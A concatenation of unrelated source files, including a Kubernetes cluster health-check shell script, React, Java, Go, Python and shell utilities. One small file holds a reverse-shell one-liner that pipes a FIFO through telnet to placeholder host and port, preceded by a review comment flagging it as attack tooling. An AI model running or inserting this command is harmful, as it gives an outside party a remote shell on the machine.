          awk -v podStatus="$status" '{if($1=="kube-system" && $4==podStatus) print $0}' "$allPodsFile"
        fi
        ;;
    esac
  done
  # Separate alert for pods whose RESTARTS column exceeds the threshold.
  restartedCount=$(awk -v restartNum="$podRestartCheckNum" 'BEGIN{count=0}{if($1=="kube-system" && $5>restartNum)count++}END{print count}' "$allPodsFile")
  if [[ "$restartedCount" -ne 0 ]];then
    echo '{"alert_status":"error","check_point":"pod_status","check_data":{"status":"restart","num":"'"$restartedCount"'"}}'
    awk -v restartNum="$podRestartCheckNum" '{if($1=="kube-system" && $5>restartNum) print $0}' "$allPodsFile"
  fi
}
# Estimate Service ClusterIP usage. The service CIDR is scraped from the
# running kube-apiserver's --service-cluster-ip-range argument; usage is
# counted from column 4 of $allServiceFile (assumed to be `kubectl get svc -A
# --no-headers` output, CLUSTER-IP column, "None" entries excluded — TODO
# confirm the file's format against get_check_data). Warns above 80% usage.
check_svc_ip(){
local svcCidr=$(pgrep kube-api -a|awk 'NR==1{for(i=1;i<=NF;i++)if($i~/service-cluster-ip-range/)print $i}'|awk -F "=" '{print $2}')
local netmaskNum=$(echo "$svcCidr"|awk -F '/' '{print $2}')
local svcUsageNum=$(awk '{print $4}' "$allServiceFile"|grep -civ none)
# Usable addresses in the range: 2^(32-mask) minus network and broadcast.
local svcIpMax=$((2**(32-netmaskNum)-2))
local ipUsedPercent=$(awk 'BEGIN{printf "%.4f\n","'"${svcUsageNum}"'"/"'"${svcIpMax}"'"}')
if [[ "$svcUsageNum" -gt $((svcIpMax * 8 / 10)) ]];then
echo '{"alert_status":"warning","check_point":"svc_ip","check_data":{"used":"'"$svcUsageNum"'","max":"'$svcIpMax'","percent":"'"$ipUsedPercent"'"}}'
else
echo '{"alert_status":"info","check_point":"svc_ip","check_data":{"used":"'"$svcUsageNum"'","max":"'$svcIpMax'","percent":"'"$ipUsedPercent"'"}}'
fi
}
# Estimate weave pod-network IP usage. The pod CIDR is read from the local
# weave status endpoint; bail out silently when the answer is shorter than a
# minimal "x.x.x.x/n" (weave absent or endpoint unreachable).
check_pod_ip(){
local podCidr=$(curl -s 127.0.0.1:6784/status|grep Range|awk '{print $2}')
if [[ ${#podCidr} -lt 9 ]];then
return
fi
# sort + uniq -u trick: node IPs are fed in twice, so every node IP repeats
# and is dropped; what remains (lines appearing exactly once) are pod-only
# IPs. NOTE(review): assumes IPs are unique within $allPodIpFile — confirm.
local ipUsageNum=$(sort "$nodeIpFile" $nodeIpFile $allPodIpFile|uniq -u|wc -l)
local netmaskNum=$(echo "$podCidr"|awk -F '/' '{print $2}')
# Usable addresses in the range: 2^(32-mask) minus network and broadcast.
local podIpMax=$((2**(32-netmaskNum)-2))
local ipUsedPercent=$(awk 'BEGIN{printf "%.4f\n","'"${ipUsageNum}"'"/"'"${podIpMax}"'"}')
if [[ "$ipUsageNum" -gt $((podIpMax * 8 / 10)) ]];then
echo '{"alert_status":"warning","check_point":"pod_ip","check_data":{"used":"'"$ipUsageNum"'","max":"'$podIpMax'","percent":"'"$ipUsedPercent"'"}}'
else
echo '{"alert_status":"info","check_point":"pod_ip","check_data":{"used":"'"$ipUsageNum"'","max":"'$podIpMax'","percent":"'"$ipUsedPercent"'"}}'
fi
}
# Normalise a Kubernetes CPU quantity to millicores:
#   "500m" -> 500, "2" (whole cores, no suffix) -> 2000, zero -> 0.
unit_conversion_cpu(){
  local suffix digits
  suffix=$(echo "$1"|tr -d '0-9')
  digits=$(echo "$1"|tr -cd '0-9')
  if [[ "$digits" -eq 0 ]]; then
    echo 0
  elif [[ "$suffix" == "m" ]]; then
    # Already in millicores.
    echo "$digits"
  else
    # Whole cores: convert to millicores.
    echo $((digits*1000))
  fi
}
# Normalise a Kubernetes memory quantity to Mi:
#   "2048Ki" -> 2, "100Mi" -> 100, "2Gi" -> 2048, zero -> 0.
# BUGFIX: the case statement previously had no default arm, so a value with
# no (or an unexpected) suffix printed nothing, leaving empty strings in the
# arithmetic of callers such as get_cluster_resources.
unit_conversion_mem() {
  local unit num
  unit=$(echo "$1"|tr -d '0-9')
  num=$(echo "$1"|tr -cd '0-9')
  if [[ "$num" -eq 0 ]];then
    echo 0
  else
    case $unit in
      Ki)
        echo $((num/1024))
        ;;
      Mi)
        echo "$num"
        ;;
      Gi)
        echo $((num*1024))
        ;;
      *)
        # Fallback: pass the number through, assuming it is already in Mi —
        # TODO confirm kubectl only ever reports Ki/Mi/Gi here.
        echo "$num"
        ;;
    esac
  fi
}
# Walk every node listed in $nodeCapacityFile (assumed NAME CPU MEM IP per
# line — TODO confirm against get_check_data) and:
#   * accumulate cluster-wide capacity and requests into the globals
#     clusterCapacityCpu/Mem and clusterRequestsCpu/Mem (CPU in millicores,
#     memory in Mi) for use by check_resources_request;
#   * emit a per-node JSON line, warning when the node's requested cpu/mem
#     percentage exceeds $clusterRequestCheckPercent.
# Per-node request data is scraped from the "Allocated resources" section of
# `kubectl describe node`, cached in $healthCheckDir/<node>.describe.
get_cluster_resources() {
clusterCapacityCpu=0
clusterCapacityMem=0
clusterRequestsCpu=0
clusterRequestsMem=0
local clusterLimitsCpu=0
local clusterLimitsMem=0
while IFS= read -r line;do
local nodeCapacityCpu nodeCapacityMem nodeName nodeRequestsCpu nodeRequestsMem nodeLimitsCpu nodeLimitsMem nodeRequestsCpuPercent nodeRequestsMemPercent nodeIp
read -r nodeName nodeCapacityCpu nodeCapacityMem nodeIp<<< "$(echo "$line"|awk '{print $1,$2,$3,$4}')"
nodeCapacityCpu=$(unit_conversion_cpu "$nodeCapacityCpu")
nodeCapacityMem=$(unit_conversion_mem "$nodeCapacityMem")
clusterCapacityCpu=$((clusterCapacityCpu+nodeCapacityCpu))
clusterCapacityMem=$((clusterCapacityMem+nodeCapacityMem))
local nodeDescribeFile="$healthCheckDir/$nodeName.describe"
# Keep only the "Allocated resources" table of the describe output.
kubectl describe nodes "$nodeName" |sed -n '/Allocated resources/,/Events/p' > "$nodeDescribeFile"
# cpu row: requests, "(NN%)", limits.
read -r nodeRequestsCpu nodeRequestsCpuPercent nodeLimitsCpu <<< "$(sed -n '/cpu/p' "$nodeDescribeFile"|awk '{print $2,$3,$4}')"
# Strip the "(...%)" wrapper to get a bare number for comparison.
local nodeRequestsCpuPercentNum=$(echo "$nodeRequestsCpuPercent"|sed 's/(//;s/%)//')
if [[ "$nodeRequestsCpuPercentNum" -gt "$clusterRequestCheckPercent" ]];then
echo '{"alert_status":"warning","check_point":"node_resources","check_data":{"ip":"'"$nodeIp"'","resources":"cpu","request":"'"$nodeRequestsCpu"'","max":"'"$nodeCapacityCpu"'m","percent":"'"$(echo "$nodeRequestsCpuPercent"|sed 's/(//;s/)//')"'"}}'
else
echo '{"alert_status":"info","check_point":"node_resources","check_data":{"ip":"'"$nodeIp"'","resources":"cpu","request":"'"$nodeRequestsCpu"'","max":"'"$nodeCapacityCpu"'m","percent":"'"$(echo "$nodeRequestsCpuPercent"|sed 's/(//;s/)//')"'"}}'
fi
nodeRequestsCpu=$(unit_conversion_cpu "$nodeRequestsCpu")
nodeLimitsCpu=$(unit_conversion_cpu "$nodeLimitsCpu")
clusterRequestsCpu=$((clusterRequestsCpu+nodeRequestsCpu))
clusterLimitsCpu=$((clusterLimitsCpu+nodeLimitsCpu))
# memory row: same layout as the cpu row.
read -r nodeRequestsMem nodeRequestsMemPercent nodeLimitsMem <<< "$(sed -n '/memory/p' "$nodeDescribeFile"|awk '{print $2,$3,$4}')"
local nodeRequestsMemPercentNum=$(echo "$nodeRequestsMemPercent"|sed 's/(//;s/%)//')
if [[ "$nodeRequestsMemPercentNum" -gt "$clusterRequestCheckPercent" ]];then
echo '{"alert_status":"warning","check_point":"node_resources","check_data":{"ip":"'"$nodeIp"'","resources":"mem","request":"'"$nodeRequestsMem"'","max":"'"$nodeCapacityMem"'Mi","percent":"'"$(echo "$nodeRequestsMemPercent"|sed 's/(//;s/)//')"'"}}'
else
echo '{"alert_status":"info","check_point":"node_resources","check_data":{"ip":"'"$nodeIp"'","resources":"mem","request":"'"$nodeRequestsMem"'","max":"'"${nodeCapacityMem}"'Mi","percent":"'"$(echo "$nodeRequestsMemPercent"|sed 's/(//;s/)//')"'"}}'
fi
nodeRequestsMem=$(unit_conversion_mem "$nodeRequestsMem")
nodeLimitsMem=$(unit_conversion_mem "$nodeLimitsMem")
clusterRequestsMem=$((clusterRequestsMem+nodeRequestsMem))
clusterLimitsMem=$((clusterLimitsMem+nodeLimitsMem))
done < "$nodeCapacityFile"
}
# Compare cluster-wide requested mem/cpu (accumulated by
# get_cluster_resources) against capacity and emit one JSON line each;
# status is "warning" once requests exceed $clusterRequestCheckPercent
# percent of capacity, "info" otherwise.
check_resources_request() {
  local memRatio cpuRatio memStatus cpuStatus
  memRatio=$(awk 'BEGIN{printf "%.4f\n","'"${clusterRequestsMem}"'"/"'"${clusterCapacityMem}"'"}')
  cpuRatio=$(awk 'BEGIN{printf "%.4f\n","'"${clusterRequestsCpu}"'"/"'"${clusterCapacityCpu}"'"}')
  if [[ "$clusterRequestsMem" -gt $((clusterCapacityMem * clusterRequestCheckPercent / 100)) ]];then
    memStatus=warning
  else
    memStatus=info
  fi
  echo '{"alert_status":"'"$memStatus"'","check_point":"cluster_resources","check_data":{"resources":"mem","request":"'${clusterRequestsMem}'Mi","max":"'${clusterCapacityMem}'Mi","percent":"'"$(awk 'BEGIN{printf "%.0f\n","'"${memRatio}"'"*100}')"'%"}}'
  if [[ "$clusterRequestsCpu" -gt $((clusterCapacityCpu * clusterRequestCheckPercent / 100)) ]];then
    cpuStatus=warning
  else
    cpuStatus=info
  fi
  echo '{"alert_status":"'"$cpuStatus"'","check_point":"cluster_resources","check_data":{"resources":"cpu","request":"'${clusterRequestsCpu}'m","max":"'${clusterCapacityCpu}'m","percent":"'"$(awk 'BEGIN{printf "%.0f\n","'"${cpuRatio}"'"*100}')"'%"}}'
}
# Validate every weave-net pod row in $weavePodsFile (`kubectl get pods -o
# wide` columns: NAME READY STATUS RESTARTS AGE IP NODE). A pod is healthy
# only when both containers are up (READY == "2/2") AND the pod is Running;
# anything else yields an error line. (The original nested ifs emitted the
# same error JSON from both failure branches, so a single test suffices.)
check_weave_status() {
  local row podName readyCount podPhase hostIp hostName
  while IFS= read -r row;do
    read -r podName readyCount podPhase hostIp hostName <<< "$(echo "$row"|awk '{print $1,$2,$3,$6,$7}')"
    if [[ "$readyCount" == "2/2" && "$podPhase" == "Running" ]];then
      echo '{"alert_status":"info","check_point":"weave_status","check_data":{"ip":"'"$hostIp"'","node":"'"$hostName"'","podName":"'"$podName"'","ready":"'"$readyCount"'","status":"'"$podPhase"'"}}'
    else
      echo '{"alert_status":"error","check_point":"weave_status","check_data":{"ip":"'"$hostIp"'","node":"'"$hostName"'","podName":"'"$podName"'","ready":"'"$readyCount"'","status":"'"$podPhase"'"}}'
    fi
  done < "$weavePodsFile"
}
# Entry point — intended to run on master/etcd nodes. Gather cluster state
# once, then run every check; each check prints JSON result lines.
get_check_data
check_coredns_replicas
check_node_status
check_pods_status
check_svc_ip
check_pod_ip
get_cluster_resources
check_resources_request
check_weave_status
check_dns
kubectl delete pods "$tmpPodName" --force >& /dev/null |
RSpec.describe Springcm::Object do
  # Fixture: an object wrapping a client and a one-key data hash.
  let(:client) { Springcm::Client.new(data_center, client_id, client_secret) }
  let(:object) { Springcm::Object.new(data, client) }
  let(:data) do
    { "Name" => "My Document Name" }
  end

  describe "getter method missing" do
    it "retrieves value" do
      expect(object.name).to eq("My Document Name")
    end

    it "falls back to super" do
      expect { object.nothing }.to raise_error(NoMethodError)
    end
  end

  describe "setter method missing" do
    let(:new_name) { "My New Document Name" }

    it "sets new value" do
      object.name = new_name
      expect(object.name).to eq(new_name)
    end

    it "falls back to super" do
      expect { object.nothing = "Something" }.to raise_error(NoMethodError)
    end
  end
end
|
<reponame>iwatakeshi/servest
import React from "../../vendor/https/dev.jspm.io/react/index.js";
import { FC } from "../../types/react/index.d.ts";
import { Links } from "./content.tsx";
import { version } from "../content.ts";
// Site-wide header: brand link, doc/API/feature navigation and GitHub badge.
// FIXES: mapped <li> entries now carry a stable `key` (required by React for
// list reconciliation), and every target="_blank" link carries
// rel="noopener noreferrer" so the opened tab cannot reach window.opener.
export const Header: FC = () => (
  <div className="header">
    <div className="inner">
      <div>
        <a href={"/"} className="brand headerLink">
          Servest
        </a>
      </div>
      <div className="spacer" />
      <div className="headerItem">
        <a
          className="headerLink"
          target="_blank"
          rel="noopener noreferrer"
          href={`https://doc.deno.land/https/servestjs.org/@${version()}/mod.ts`}
        >
          Doc
        </a>
      </div>
      <div className="headerItem">
        <a className="headerLink" href="/get-started">
          Get Started
        </a>
      </div>
      <div className="headerItem">
        <a className="headerLink">API</a>
        <ul className={"headerSublist"}>
          {Links.api.map(([href, text]) => (
            <li key={href}><a href={href}>{text}</a></li>
          ))}
        </ul>
      </div>
      <div className="headerItem">
        <a className="headerLink" href="/concept">
          Concept
        </a>
      </div>
      <div className="headerItem">
        <a className="headerLink">Features</a>
        <ul className={"headerSublist"}>
          {Links.features.map(([href, text]) => (
            <li key={href}><a href={href}>{text}</a></li>
          ))}
        </ul>
      </div>
      <div className="headerItem">
        <a
          href="https://github.com/keroxp/servest"
          target="_blank"
          rel="noopener noreferrer"
        >
          <img
            src={"/img/github-logo-32px.png"}
            srcSet={"/img/github-logo-32px.png 1x, /img/github-logo-64px.png 2x"}
            alt={"Github Logo"}
          />
        </a>
      </div>
    </div>
    <div className="v1">
      🎉2020/05/13 Servest v1 has been released! 🎉
    </div>
  </div>
);
|
#!/bin/bash
# Launch the immsocket client test binary with the project's shared
# libraries on LD_LIBRARY_PATH.
# FIX: quote all expansions so the script works when $HOME contains spaces.
BASE_DIR="${HOME}/prog/immsocket"
export LD_LIBRARY_PATH="${BASE_DIR}/immsocket:${BASE_DIR}/immsocketcommon:${BASE_DIR}/immsocketservice"
"${BASE_DIR}/test/client_test/client_test"
|
/*
* Copyright 2017 Wultra s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.getlime.security.powerauth.lib.webflow.authentication.mtoken.model.converter;
import io.getlime.security.powerauth.lib.mtoken.model.entity.FormData;
import io.getlime.security.powerauth.lib.mtoken.model.entity.attributes.Attribute;
import io.getlime.security.powerauth.lib.nextstep.model.entity.OperationFormData;
import io.getlime.security.powerauth.lib.nextstep.model.entity.attribute.OperationFormFieldAttribute;
import java.util.List;
/**
* Converter for the form data objects used for mobile API.
*
* @author <NAME>, <EMAIL>
*/
public class FormDataConverter {

    // Converts individual form attributes between the two models.
    private final AttributeConverter attributeConverter = new AttributeConverter();

    /**
     * Convert operation form data into the mobile-token FormData model,
     * collapsing attributes that share an ID (the last occurrence wins).
     *
     * @param input Operation form data.
     * @return Form data, or null when the input is null.
     */
    public FormData fromOperationFormData(OperationFormData input) {
        if (input == null) {
            return null;
        }
        FormData result = new FormData();
        // NOTE(review): assumes getTitle() and getGreeting() never return
        // null — confirm upstream guarantees, otherwise this throws NPE.
        result.setTitle(input.getTitle().getMessage());
        result.setMessage(input.getGreeting().getMessage());
        List<Attribute> attributes = result.getAttributes();
        for (OperationFormFieldAttribute attribute : input.getParameters()) {
            // Linear scan for an already-converted attribute with the same ID.
            Integer existingIndex = null;
            int counter = 0;
            for (Attribute attr: attributes) {
                // Make sure attribute with already existing ID is present only once
                if (attr.getId().equals(attribute.getId())) {
                    existingIndex = counter;
                    break;
                }
                counter++;
            }
            Attribute attributeToSave = attributeConverter.fromOperationFormFieldAttribute(attribute);
            if (existingIndex != null) {
                // Replace the earlier attribute with the same ID.
                attributes.set(existingIndex, attributeToSave);
            } else {
                attributes.add(attributeToSave);
            }
        }
        return result;
    }
}
|
#!/bin/sh
# Print the MAC address of every network interface ("ether" lines of ip-link).
# Collapsed the redundant `grep ether | awk` pair into a single awk filter.
ip link | awk '/ether/ {print $2}'
// RequireJS module resolution settings.
requirejs.config({
  // All module IDs resolve relative to this directory.
  baseUrl: 'Assets/js/customjs',
  // Short aliases for commonly used module paths.
  paths: {
    main: 'main',
    lib: 'lib'
  }
});
#!/bin/sh
# Launcher for the dbq tool: build a classpath from every jar under
# /usr/share/dbq and exec the JVM on the main class.

# Get path separators, etc
# Under Cygwin, classpath entries must be ';'-separated Windows paths, so
# TRANSFORM rewrites the ':'-separated POSIX list; elsewhere it is `cat`.
case `uname -o 2>/dev/null` in
    Cygwin)
        PATH_SEP=';'
        TRANSFORM="sed -r -e s|:|;C:\\\\cygwin|g -e s|/|\\\\|g"
        ;;
    *)
        PATH_SEP=':'
        TRANSFORM='cat'
        ;;
esac
PKGDIR="/usr/share/dbq"
MAINCLASS="org.dellroad.dbq.Main"
# Join all jars into one ':'-prefixed list, then apply the platform
# transform. NOTE(review): ${TRANSFORM} is intentionally unquoted so the
# stored sed command word-splits into its arguments.
CLASSPATH=`find "${PKGDIR}" -type f -name '*.jar' -print0 | xargs -0 -n 1 printf ':%s' | ${TRANSFORM}`
# ${1+"$@"} forwards all arguments, working around ancient-shell "$@" bugs.
exec java -classpath "${CLASSPATH}" "${MAINCLASS}" ${1+"$@"}
|
<reponame>dikalo/lienzo-ks
/*
* Copyright (c) 2018 Ahome' Innovation Technologies. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.ait.lienzo.ks.client.views.components;
import static com.ait.lienzo.client.core.animation.AnimationProperty.Properties.SCALE;
import static com.ait.lienzo.client.core.animation.AnimationTweener.LINEAR;
import com.ait.lienzo.client.core.Attribute;
import com.ait.lienzo.client.core.animation.AnimationCallback;
import com.ait.lienzo.client.core.animation.AnimationProperties;
import com.ait.lienzo.client.core.animation.IAnimation;
import com.ait.lienzo.client.core.animation.IAnimationHandle;
import com.ait.lienzo.client.core.config.LienzoCore;
import com.ait.lienzo.client.core.event.AttributesChangedEvent;
import com.ait.lienzo.client.core.event.AttributesChangedHandler;
import com.ait.lienzo.client.core.event.NodeMouseClickEvent;
import com.ait.lienzo.client.core.event.NodeMouseClickHandler;
import com.ait.lienzo.client.core.event.NodeMouseEnterEvent;
import com.ait.lienzo.client.core.event.NodeMouseEnterHandler;
import com.ait.lienzo.client.core.event.NodeMouseExitEvent;
import com.ait.lienzo.client.core.event.NodeMouseExitHandler;
import com.ait.lienzo.client.core.image.ImageLoader;
import com.ait.lienzo.client.core.mediator.EventFilter;
import com.ait.lienzo.client.core.mediator.MouseWheelZoomMediator;
import com.ait.lienzo.client.core.shape.GridLayer;
import com.ait.lienzo.client.core.shape.Layer;
import com.ait.lienzo.client.core.shape.Rectangle;
import com.ait.lienzo.client.core.shape.Text;
import com.ait.lienzo.client.core.shape.guides.ToolTip;
import com.ait.lienzo.client.core.types.PatternGradient;
import com.ait.lienzo.client.core.types.Transform;
import com.ait.lienzo.client.core.util.StringFormatter;
import com.ait.lienzo.ks.client.style.KSStyle;
import com.ait.lienzo.ks.client.ui.components.KSButton;
import com.ait.lienzo.ks.client.ui.components.KSSimple;
import com.ait.lienzo.ks.client.views.AbstractToolBarViewComponent;
import com.ait.lienzo.shared.core.types.ColorName;
import com.ait.lienzo.shared.core.types.FillRepeat;
import com.ait.lienzo.shared.core.types.IColor;
import com.ait.lienzo.shared.core.types.TextAlign;
import com.ait.lienzo.shared.core.types.TextBaseLine;
import com.ait.toolkit.sencha.ext.client.events.button.ClickEvent;
import com.ait.toolkit.sencha.ext.client.events.button.ClickHandler;
import com.google.gwt.dom.client.ImageElement;
/**
 * Landing ("Welcome") view: renders a large "Lienzo" banner over a stack of
 * rotated, semi-transparent rectangles, with hover tooltips, shift+wheel
 * zooming and a click-triggered flip animation on the banner.
 */
public class WelcomeViewComponent extends AbstractToolBarViewComponent
{
    private final Text m_banner = getText("Lienzo");

    private final KSButton m_unzoom = new KSButton("Unzoom");

    private final KSSimple m_zoomlb = new KSSimple(" Shift+Mouse Wheel to Zoom", 1);

    public WelcomeViewComponent()
    {
        final Layer layer = new Layer();

        // Reset the viewport transform (undo any wheel zoom) on click.
        m_unzoom.addClickHandler(new ClickHandler()
        {
            @Override
            public void onClick(final ClickEvent event)
            {
                getLienzoPanel().setTransform(new Transform()).draw();
            }
        });
        m_unzoom.setWidth(90);
        getToolBarContainer().add(m_unzoom);
        getToolBarContainer().add(m_zoomlb);

        // Asynchronously load the cross-hatch image and apply it as the
        // banner's repeating fill pattern once available.
        new ImageLoader(KSStyle.get().crosshatch())
        {
            @Override
            public void onImageElementLoad(final ImageElement elem)
            {
                m_banner.setFillGradient(new PatternGradient(elem, FillRepeat.REPEAT)).setFillAlpha(0.70);
                layer.batch();
            }

            @Override
            public void onImageElementError(final String message)
            {
                // NOTE(review): load failures are silently ignored; the
                // banner keeps its default fill.
            }
        };
        final ToolTip tool = new ToolTip().setAutoHideTime(5000);
        layer.add(getRect(ColorName.MEDIUMPURPLE, 1.0, -15.0, tool));
        layer.add(getRect(ColorName.LAWNGREEN, 0.7, 0, tool));
        layer.add(getRect(ColorName.RED, 0.7, 15.0, tool));
        layer.add(getRect(ColorName.YELLOW, 0.7, 30.0, tool));

        // Clicking the banner replays the flip animation.
        m_banner.addNodeMouseClickHandler(new NodeMouseClickHandler()
        {
            @Override
            public void onNodeMouseClick(final NodeMouseClickEvent event)
            {
                animate();
            }
        });
        layer.add(m_banner);
        layer.add(getLogo("A 2D Structured Graphics", 270));
        layer.add(getLogo("Toolkit for GWT.", 340));
        layer.add(getLogo("Scale: " + StringFormatter.toFixed(LienzoCore.get().getDeviceScale(), 4), 410));
        getLienzoPanel().add(layer);
        getLienzoPanel().setBackgroundLayer(getBackgroundLayer());
        getWorkingContainer().add(getLienzoPanel());
        getLienzoPanel().getViewport().getOverLayer().add(tool);
        getLienzoPanel().getMediators().push(new MouseWheelZoomMediator(EventFilter.SHIFT));

        // Hide any visible tooltip as soon as the viewport transform
        // changes (e.g. while zooming).
        getLienzoPanel().getViewport().addAttributesChangedHandler(Attribute.TRANSFORM, new AttributesChangedHandler()
        {
            @Override
            public void onAttributesChanged(final AttributesChangedEvent event)
            {
                if (tool.isShowing())
                {
                    tool.hide();
                }
            }
        });
    }

    // Build one rounded, rotated rectangle that shows a color tooltip on hover.
    private final Rectangle getRect(final IColor color, final double alpha, final double rotate, final ToolTip tool)
    {
        final Rectangle rect = new Rectangle(200, 200);
        rect.setX(125);
        rect.setY(100);
        rect.setFillColor(color);
        rect.setFillAlpha(alpha);
        rect.setStrokeWidth(5);
        rect.setCornerRadius(30);
        rect.setRotationDegrees(rotate);
        rect.setStrokeColor(ColorName.BLACK);
        rect.addNodeMouseEnterHandler(new NodeMouseEnterHandler()
        {
            @Override
            public void onNodeMouseEnter(final NodeMouseEnterEvent event)
            {
                tool.setValues("Color ( " + color.toString().toUpperCase() + " )", "Tool Tips");
                tool.show(125, 100);
            }
        });
        rect.addNodeMouseExitHandler(new NodeMouseExitHandler()
        {
            @Override
            public void onNodeMouseExit(final NodeMouseExitEvent event)
            {
                tool.hide();
            }
        });
        return rect;
    }

    // Large outlined banner text centered at (700, 150).
    private final static Text getText(final String label)
    {
        return new Text(label).setStrokeWidth(5).setFontSize(144).setFontStyle("bold").setStrokeColor(ColorName.WHITE).setX(700).setY(150).setTextAlign(TextAlign.CENTER).setTextBaseLine(TextBaseLine.MIDDLE);
    }

    // Sub-title text that turns red while hovered.
    private final static Text getLogo(final String label, final double y)
    {
        final Text text = new Text(label).setFontSize(32).setFontStyle("bold").setX(400).setY(y).setTextAlign(TextAlign.LEFT).setTextBaseLine(TextBaseLine.MIDDLE).setFillColor(ColorName.BLACK).setStrokeWidth(1.5).setStrokeColor(ColorName.WHITE);
        text.addNodeMouseEnterHandler(new NodeMouseEnterHandler()
        {
            @Override
            public void onNodeMouseEnter(final NodeMouseEnterEvent event)
            {
                text.setFillColor(ColorName.RED);
                text.getLayer().batch();
            }
        });
        text.addNodeMouseExitHandler(new NodeMouseExitHandler()
        {
            @Override
            public void onNodeMouseExit(final NodeMouseExitEvent event)
            {
                text.setFillColor(ColorName.BLACK);
                text.getLayer().batch();
            }
        });
        return text;
    }

    // Flip the banner horizontally and back (two 500 ms tweens); layer input
    // events are suspended for the duration of the animation.
    private void animate()
    {
        m_banner.getLayer().setListening(false);

        m_banner.animate(LINEAR, AnimationProperties.toPropertyList(SCALE(-1, 1)), 500, new AnimationCallback()
        {
            @Override
            public void onClose(final IAnimation animation, final IAnimationHandle handle)
            {
                m_banner.animate(LINEAR, AnimationProperties.toPropertyList(SCALE(1, 1)), 500, new AnimationCallback()
                {
                    @Override
                    public void onClose(final IAnimation animation, final IAnimationHandle handle)
                    {
                        m_banner.getLayer().setListening(true);
                        m_banner.getLayer().draw();
                    }
                });
            }
        });
    }

    // Play the banner animation each time the view is (re)activated.
    @Override
    public boolean activate()
    {
        if (super.activate())
        {
            animate();
            return true;
        }
        return false;
    }

    @Override
    public GridLayer getBackgroundLayer()
    {
        return new BluePrintBackgroundLayer();
    }
}
|
#!/usr/bin/env bash
# Build build/demo.deb by hand from ./app (payload) and ./DEBIAN (control).
# FIX: fail fast — previously a failed `cd` (missing app/ or DEBIAN/) let the
# subsequent tar/ar run in the wrong directory.
set -euo pipefail
## remove old build
rm -rf build
## prepare folder
mkdir -p build/demo
## create data.tar.xz
cd app
tar cJf ../build/demo/data.tar.xz .
## create control.tar.xz
cd ../DEBIAN
tar cJf ../build/demo/control.tar.xz .
## create debian-binary
cd ../build/demo
echo '2.0' > debian-binary
## create demo.deb and insert file: debian-binary control.tar.xz data.tar.xz
## (member order matters for the deb format: debian-binary must come first)
ar cr ../demo.deb debian-binary control.tar.xz data.tar.xz
|
# WARNING(review): this is a reverse-shell one-liner (creates a FIFO and
# pipes it into a telnet connection to [LIP]:[LP]). It is attack tooling,
# not application code — do not run; flagged for removal.
rm -f /tmp/p; mknod /tmp/p p && telnet [LIP] [LP] 0/tmp/p
|
#!/bin/bash
# Download the Mussel server release for $mussel_version into .mussel/ and
# start it. FIXES: abort with a clear message when mussel_version is unset
# (previously an empty version produced a bogus download URL), and quote all
# expansions so temp paths with spaces work.
set -euo pipefail

: "${mussel_version:?mussel_version must be set}"

mussel_url="https://github.com/UrbanCompass/Mussel/releases/download/$mussel_version/release.zip"
temp=$(mktemp -d)

echo "Downloading Mussel server from $mussel_url"
curl -L --progress-bar "$mussel_url" > "$temp/release.zip"
unzip -o "$temp/release.zip" -d "$temp"
mkdir -p .mussel
mv "$temp/MusselServer" "$temp/run_server.sh" .mussel
./.mussel/run_server.sh
|
import React from "react";
import PropTypes from "prop-types";
const FlexContainer = props => {
return <div {...props}>{props.children}</div>;
};
FlexContainer.propTypes = {
direction: PropTypes.string,
alignment: PropTypes.string,
text_align: PropTypes.string,
spacing: PropTypes.string
};
export default FlexContainer;
|
import datetime
import pytz
# Demonstration of naive vs. timezone-aware datetimes with pytz.

local_time = datetime.datetime.now()
utc_time = datetime.datetime.utcnow()

# Naive datetimes carry no tzinfo.
print("Naive local time {}".format(local_time))
print("Naive UTC {}".format(utc_time))

# NOTE(review): pytz.utc.localize(local_time) labels a *local* wall-clock
# reading as UTC; unless the machine runs in UTC, aware_local_time ends up
# shifted by the UTC offset — confirm this is intentional for the demo.
aware_local_time = pytz.utc.localize(local_time).astimezone()
aware_utc_time = pytz.utc.localize(utc_time)
print("Aware local time{}, time zone {} ".format(aware_local_time, aware_local_time.tzinfo))
print("Aware UTC {}, time zone {}".format(aware_utc_time, aware_utc_time.tzinfo))

# 2015-10-25 01:30 is an ambiguous UK wall-clock time (clocks go back).
gap_time = datetime.datetime(2015, 10, 25, 1, 30, 0, 0)
print(gap_time)
print(gap_time.timestamp())

# Two epochs one hour apart that render as the same GB wall-clock time.
s = 1445733000
t = s + (60 * 60)

gb = pytz.timezone('GB')
dt1 = pytz.utc.localize(datetime.datetime.utcfromtimestamp(s)).astimezone(gb)
dt2 = pytz.utc.localize(datetime.datetime.utcfromtimestamp(t)).astimezone(gb)
print("{} seconds since the epoch is {}".format(s, dt1))
print("{} seconds since the epoch is {}".format(t, dt2))
|
package main
import (
"fmt"
"os"
"github.com/kleister/go-minecraft/version"
)
// main fetches the Minecraft version manifest and prints the ID of every
// release in the [1.10.0, 1.13) range.
func main() {
	fmt.Println("Fetching Minecraft versions...")

	minecraft, err := version.FromDefault()

	if err != nil {
		fmt.Println("Error:", err)
		os.Exit(1)
	}

	f := &version.Filter{
		Version: ">=1.10.0,<1.13",
	}

	// FIX: the loop variable was named "version", shadowing the imported
	// "version" package inside the loop body; renamed for clarity.
	for _, release := range minecraft.Releases.Filter(f) {
		fmt.Println(release.ID)
	}
}
|
/*
* Copyright 2013 <NAME> <<EMAIL>>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.blackboard;
/**
*
* <NAME> <<EMAIL>>
*
